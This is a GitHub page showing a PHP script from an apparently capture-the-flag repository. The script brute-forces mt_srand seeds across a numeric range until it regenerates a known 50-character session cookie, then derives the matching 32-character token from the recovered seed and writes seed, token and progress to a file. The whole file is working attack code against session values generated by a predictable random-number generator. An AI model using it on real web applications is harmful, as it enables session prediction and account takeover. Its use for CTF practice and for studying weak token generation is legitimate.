forked from Christianous/CTF-Scripts
/
weak_cookie_bruteforcer.php
54 lines (46 loc) · 1.23 KB
/
weak_cookie_bruteforcer.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#!/usr/bin/env php
<?php
$start = intval($argv[1]);
$end = intval($argv[2]);
if(sizeof($argv)!=3) {
die("SUCKER!!!");
}
$cookie = "yWzBRHaY7KP7QA8ReauAeIxYf5E0Uy1X7pPAm07mZoiAdqzpAh";
$fp = fopen('data'.$start.'.txt', 'w');
$i = $start;
while ($i < $end) {
//$seed=strval($i);
$seed=$i;
mt_srand($seed);
$cook = generateSession();
if ( $cook === $cookie) {
$message = "seed: " . $seed ."\n";
$message .= "token: " . genToken() . "\n";
fwrite($fp, $message);
break;
}
if ($seed % 10000 == 0) {
$pourcent = ($seed-$start)*100/($end-$start);
$message = "Avancement: $pourcent%\n";
fwrite($fp, $message);
}
$i += 1;
}
fclose($fp);
function genToken() {
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
$token = "";
for($i = 0; $i < 32; $i++) {
$token .= $chars[mt_rand(0,strlen($chars)-1)];
}
return $token;
}
function generateSession() {
$chars = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$session = "";
for($i = 0; $i < 50; $i++) {
$session .= $chars[mt_rand(0,strlen($chars)-1)];
}
return $session;
}
?>